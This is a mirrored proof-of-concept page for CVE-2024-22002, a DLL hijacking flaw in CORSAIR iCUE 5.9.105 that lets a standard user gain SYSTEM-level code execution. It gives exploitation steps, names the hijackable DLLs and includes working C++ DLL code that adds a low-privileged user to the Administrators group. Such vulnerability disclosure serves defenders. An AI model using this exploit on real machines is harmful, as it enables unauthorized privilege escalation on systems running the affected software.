Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-22002 PoC — CORSAIR iCUE 安全漏洞

Source
Associated Vulnerability
Title:CORSAIR iCUE 安全漏洞 (CVE-2024-22002)
Description:CORSAIR iCUE 5.9.105 with iCUE Murals on Windows allows unprivileged users to insert DLL files in the cuepkg-1.2.6 subdirectory of the installation directory.
Readme

## Vulnerable software and version
- Software download link: [CORSAIR iCUE v5.9.105 with iCUE Murals](https://www.corsair.com/es/es/s/downloads)
## Description
A DLL Hijacking vulnerability has been identified in iCUE v5.9.105. This vulnerability occurs during the update process, managed by the "iCUEUpdateService" service. The service spawns a process ("cuepkg.exe") responsible for conducting the update, running with "NT AUTHORITY\SYSTEM" privileges. When initiating the process, it searches for various DLLs in the directory `\cuepkg-1.2.6`, located within the iCUE installation directory. Some of these DLLs are not present by default, but as a regular user has the privileges to create files in that directory, an attacker could potentially introduce a malicious DLL into the directory. Consequently, this malicious DLL would be loaded by `cuepkg.exe` with Administrator privileges.

The affected DLLs **detected** are the following:
- `MSASN1.dll`
- `NTASN1.dll`
- `profapi.dll`

CVSS Vector: `(AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)`
- **Base Score:** 7.8 (High)
- **Temporal Score:** 7.8 (High)
- **Environmental Score:** 7.8 (High)

## PoC
As an example, the DLL `profapi.dll` will be taken.
1. Create our malicious DLL and add it to the directory `%INSTALLDIR%cuepkg-1.2.6`.
2. Wait for the program to update automatically or, in this case, force the update by clicking "Check for updates".
3. Our user without Administrator privileges is added to the group.

Privileges of the `lowpriv` user **before** the malicious DLL is executed:
![lowpriv_cmd](https://github.com/0xkickit/iCUE_DllHijack_LPE/blob/main/lowpriv_cmd.png)

Privileges of the `lowpriv` user **after** the malicious DLL is executed:
![lowpriv_cmd_adm](https://github.com/0xkickit/iCUE_DllHijack_LPE/blob/main/lowpriv_cmd_adm.png)

- Example malicious code:
```cpp
#include "pch.h"
#include <windows.h>
#include <cstdlib>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    {
        system("net localgroup Administrators desktop-ckfiane\\lowpriv /add");
    }
    break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }

    return TRUE;
}
```
File Snapshot

[4.0K] /data/pocs/022bcd59f0263ef48178e0ee483534e2a1090525 ├── [ 48K] lowpriv_cmd_adm.png ├── [ 45K] lowpriv_cmd.png └── [2.3K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →